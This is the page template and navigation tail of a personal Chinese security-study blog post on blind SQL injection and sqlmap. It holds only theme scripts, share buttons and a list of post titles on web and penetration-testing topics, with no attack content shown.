                <a href="/2023/12/25/SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E7%9B%B2%E6%B3%A8%E5%9E%8B,%E6%8A%A5%E9%94%99%E5%9E%8B%EF%BC%8Cpostman%E8%BD%AF%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/">
                    SQL注入之盲注型,报错型，postman软件的使用
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2023/12/23/SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E8%81%94%E5%90%88%E5%9E%8B/">
                    SQL注入之联合型
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E5%AE%9E%E4%BE%8B"><span class="toc-number">1.</span> <span class="toc-text">布尔盲注实例</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8-%E7%9D%A1%E7%9C%A0%E7%9B%B2%E6%B3%A8"><span class="toc-number">2.</span> <span class="toc-text">时间盲注(睡眠盲注)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8E%A7%E5%88%B6%E7%BD%91%E7%AB%99"><span class="toc-number">3.</span> <span class="toc-text">控制网站</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqlmap%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">sqlmap的使用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqlmap%E7%9A%84%E4%BD%BF%E7%94%A8-1"><span class="toc-number">5.</span> <span class="toc-text">sqlmap的使用</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-6 i,
        .toc-level-6 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="Hide"  title="Show or Hide Table of Contents">

    <script>
        yiliaConfig.toc = ["Hide", "Show", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"布尔盲注实例,时间盲注,控制网站,sqlmap工具的使用。　| Hexo　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2023/12/25/SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E7%9B%B2%E6%B3%A8%E5%9E%8B,%E6%8A%A5%E9%94%99%E5%9E%8B%EF%BC%8Cpostman%E8%BD%AF%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/" title="Pre: SQL注入之盲注型,报错型，postman软件的使用">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="Mini Archives"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2023/12/23/SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E8%81%94%E5%90%88%E5%9E%8B/" title="Next: SQL注入之联合型">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2024/01/13/Burp,Yakit%E5%AF%BC%E5%85%A5%E8%AF%81%E4%B9%A6%EF%BC%8C%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%EF%BC%8C%E5%9B%9B%E5%A4%A7webshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/">Burp,Yakit导入证书，流量分析，四大webshell管理工具</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/13/%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BA3%EF%BC%8Cxpcmd_shell%E6%8F%90%E6%9D%83/">攻破靶机3，xpcmd_shell提权</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/13/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E7%9A%84%E4%BB%8B%E7%BB%8D%EF%BC%8Cwebshell%E7%BC%96%E5%86%99%EF%BC%8Cupload-labs%E9%9D%B6%E5%9C%BA%E9%97%AF%E5%85%B3%EF%BC%8C%E8%9A%81%E5%89%91%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8/">文件上传漏洞的介绍，webshell编写，upload-labs靶场闯关，蚁剑工具的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/CDN%E4%BB%8B%E7%BB%8D%E5%8F%8A%E7%BB%95%E8%BF%87,%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/">CDN介绍及绕过,支付逻辑漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/%E6%95%99%E8%82%B2SRC%E5%88%86%E6%9E%90,%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%BC%8F%E6%B4%9E/">教育SRC分析,弱口令漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%EF%BC%8C%E5%B0%8F%E7%B1%B3%E8%8C%83%E7%9A%84%E4%BD%BF%E7%94%A8/">信息收集，小米范的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%EF%BC%8CBurp,Yakit%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%8C%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BAmoneybox/">基于表单的暴力破解，Burp,Yakit的使用，验证码绕过，攻破靶机moneybox</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/08/%E5%9F%9F%E5%90%8D%EF%BC%8C%E5%AD%90%E5%9F%9F%E5%90%8D%E8%8E%B7%E5%8F%96%EF%BC%8C%E7%99%BE%E5%BA%A6%E5%92%8C%E8%B0%B7%E6%AD%8C%E6%90%9C%E7%B4%A2%E8%AF%AD%E6%B3%95/">域名，子域名获取，百度和谷歌搜索语法</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/06/%E6%B8%97%E9%80%8F%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B%20,web%E6%89%93%E7%82%B9%EF%BC%8C%E9%9D%B6%E6%9C%BA%E6%94%BB%E7%A0%B4/">渗透基本流程 ,web打点，靶机攻破</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/01/%E5%AE%89%E5%85%A8%E7%8B%97%E7%9A%84%E5%AE%89%E8%A3%85%EF%BC%8CWAF%E7%BB%95%E8%BF%87%EF%BC%8CSQL%E6%B3%A8%E5%85%A5Oracle%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%8CBurp%E7%9A%84%E5%AE%89%E8%A3%85%E4%B8%8E%E4%BD%BF%E7%94%A8/">安全狗的安装，WAF绕过，SQL注入Oracle数据库，Burp的安装与使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/01/01/%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%EF%BC%8C%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%EF%BC%8C%E7%BB%95%E8%BF%87%20,Tamper%E8%84%9A%E6%9C%AC/">宽字节注入，堆叠注入，绕过 ,Tamper脚本</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/25/SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E7%9B%B2%E6%B3%A8%E5%9E%8B,%E6%8A%A5%E9%94%99%E5%9E%8B%EF%BC%8Cpostman%E8%BD%AF%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/">SQL注入之盲注型,报错型，postman软件的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/25/%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E5%AE%9E%E4%BE%8B,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8,%E6%8E%A7%E5%88%B6%E7%BD%91%E7%AB%99,sqlmap%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8%E3%80%82/">布尔盲注实例,时间盲注,控制网站,sqlmap工具的使用。</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/23/SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E8%81%94%E5%90%88%E5%9E%8B/">SQL注入之联合型</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/23/axios%E5%92%8Capi.php%E7%9A%84%E4%BD%BF%E7%94%A8/">axios和api.php的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/17/%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C/">文件操作</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/17/%E7%94%A8vue2%E5%86%99%E7%BD%91%E9%A1%B5/">用vue2写网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/17/%E7%94%A8vue%E5%86%99%E7%BD%91%E9%A1%B5/">用vue写网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/14/PHP%E8%B7%B3%E8%BD%AC%E9%A1%B5%E9%9D%A2%EF%BC%8CPHP%E5%86%99%E8%AF%84%E8%AE%BA%E5%8C%BA%E5%92%8C%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%A1%86/">PHP跳转页面，PHP写评论区和文件上传框</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/14/postman%E3%80%81phpstudy%E5%AE%89%E8%A3%85%EF%BC%8Cphp%E5%9F%BA%E6%9C%AC%E8%AF%AD%E6%B3%95%EF%BC%8Cphp%E8%BF%9E%E6%8E%A5%E6%95%B0%E6%8D%AE%E5%BA%93/">postman、phpstudy安装，php基本语法，php连接数据库</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/12/form%E8%A1%A8%E5%8D%95%EF%BC%8C%E5%86%99%E6%94%BF%E5%BA%9C%E7%BD%91%E9%A1%B5/">form表单，写政府网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/vue3%E7%9A%84%E4%BD%BF%E7%94%A8/">vue3的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%AD%97%E7%AC%A6%E9%9B%86%E5%92%8C%E7%BC%96%E7%A0%81/">字符集和编码</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%AD%97%E5%85%B8/">字典</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%88%97%E8%A1%A8%EF%BC%8C%E5%85%83%E7%BB%84%EF%BC%8Cset%E9%9B%86%E5%90%88/">列表，元组，set集合</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%BE%AA%E7%8E%AF%E8%AF%AD%E5%8F%A5,%E5%AD%97%E7%AC%A6%E4%B8%B2/">循环语句,字符串</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E7%AC%AC%E4%B8%80%E4%B8%AApython%E7%A8%8B%E5%BA%8F%EF%BC%8C%E7%94%A8%E6%88%B7%E4%BA%A4%E4%BA%92%EF%BC%8Cif%E6%9D%A1%E4%BB%B6%E5%88%A4%E6%96%AD/">第一个python程序，用户交互，if条件判断</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/06/%E5%A4%8D%E7%9B%98Linux%E5%91%BD%E4%BB%A4%EF%BC%8C%E5%AE%89%E8%A3%85%E5%91%BD%E4%BB%A4%E5%92%8C%E5%B7%A5%E5%85%B7%EF%BC%8CHTML5%E4%BB%8B%E7%BB%8D,%E5%86%99%E4%B8%80%E4%B8%AA%E7%BD%91%E9%A1%B5/">复盘Linux命令，安装命令和工具，HTML5介绍,写一个网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/05/%E4%BB%8B%E7%BB%8D%E8%B7%AF%E7%94%B1%EF%BC%8C%E4%BB%A3%E7%90%86%E5%92%8COSI%E6%A8%A1%E5%9E%8B%EF%BC%8CVMware%20workstation%EF%BC%8Cwireshark/">介绍路由，代理和OSI模型，VMware workstation，wireshark</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/04/%E5%A4%8D%E7%9B%98%E4%B8%8A%E5%91%A8%E7%9F%A5%E8%AF%86&%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">复盘上周知识&网络基础知识</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/02/Linux%E7%9A%84%E5%9F%BA%E6%9C%AC%E5%91%BD%E4%BB%A4%EF%BC%8Cssh%E7%99%BB%E5%BD%95/">Linux的基本命令，ssh登录</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/02/%E5%9C%A8%E7%89%A9%E7%90%86%E6%9C%BA%E4%B8%8B%E8%BD%BD%E8%BD%AF%E4%BB%B6%EF%BC%8C%E5%88%A9%E7%94%A8github%E6%90%AD%E5%BB%BAhexo%E5%8D%9A%E5%AE%A2%EF%BC%8C%E9%AA%8C%E8%AF%81%E5%9B%BE%E7%89%87%E4%B8%8A%E4%BC%A0%E5%92%8C%E6%9B%B4%E6%8D%A2%E5%8D%9A%E5%AE%A2%E4%B8%BB%E9%A2%98/">在物理机下载软件，利用github搭建hexo博客，验证图片上传和更换博客主题</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/02/%E7%A4%BE%E5%B7%A5%E5%BA%93%E6%9F%A5%E8%AF%A2%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF%EF%BC%8C%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91%EF%BC%8C%E9%92%93%E9%B1%BC%E6%94%BB%E5%87%BB%EF%BC%8Cflash%E6%8D%86%E7%BB%91%E6%9C%A8%E9%A9%AC%EF%BC%8C%E7%BD%91%E7%AB%99%E6%8F%92%E5%85%A5js%E7%BD%91%E9%A1%B5/">社工库查询个人信息，永恒之黑，钓鱼攻击，flash捆绑木马，网站插入js网页</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2016-2024 Tangxianshen
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="A fast, simple &amp; powerful blog framework">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="Another simple and elegant theme for Hexo  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="Site Visitors"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="Page Hits"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 5;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="Back to Top"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="Comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="Go to Bottom"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
             tags: ".article-tag a", 
             categories: ".article-category a, a.tag-list-link", 
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>